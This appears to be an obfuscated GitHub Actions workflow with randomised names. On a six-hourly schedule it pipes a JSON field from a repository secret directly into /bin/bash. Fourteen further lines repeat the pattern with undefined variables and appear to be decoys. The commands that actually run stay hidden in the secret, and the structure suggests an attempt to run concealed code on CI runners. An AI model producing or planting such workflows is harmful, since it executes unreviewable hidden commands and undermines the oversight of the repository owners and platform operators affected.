name: dongxinchang5647
on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongxinchang5647
        env:
          te395: ${{ secrets.te395 }}
        run: |
          echo $te395 | jq -r .m4167 | /bin/bash
          echo $vfff6 | jq -r .qkuf1996 | /bin/bash
          echo $wltll5 | jq -r .hzyl2 | /bin/bash
          echo $m50 | jq -r .jw3604 | /bin/bash
          echo $lwr14956 | jq -r .swja439 | /bin/bash
          echo $svznc048 | jq -r .nxgtc12416 | /bin/bash
          echo $fjrdg3099 | jq -r .nlqr342 | /bin/bash
          echo $hagi30 | jq -r .b4 | /bin/bash
          echo $ndlmb47867 | jq -r .uo90596 | /bin/bash
          echo $md21 | jq -r .wg5369 | /bin/bash
          echo $ygcoo333 | jq -r .wkjuk29 | /bin/bash
          echo $swn571 | jq -r .zb4249 | /bin/bash
          echo $y545 | jq -r .fgff14 | /bin/bash
          echo $yn6 | jq -r .bi755 | /bin/bash
          echo $uvitb68251 | jq -r .uhv5 | /bin/bash

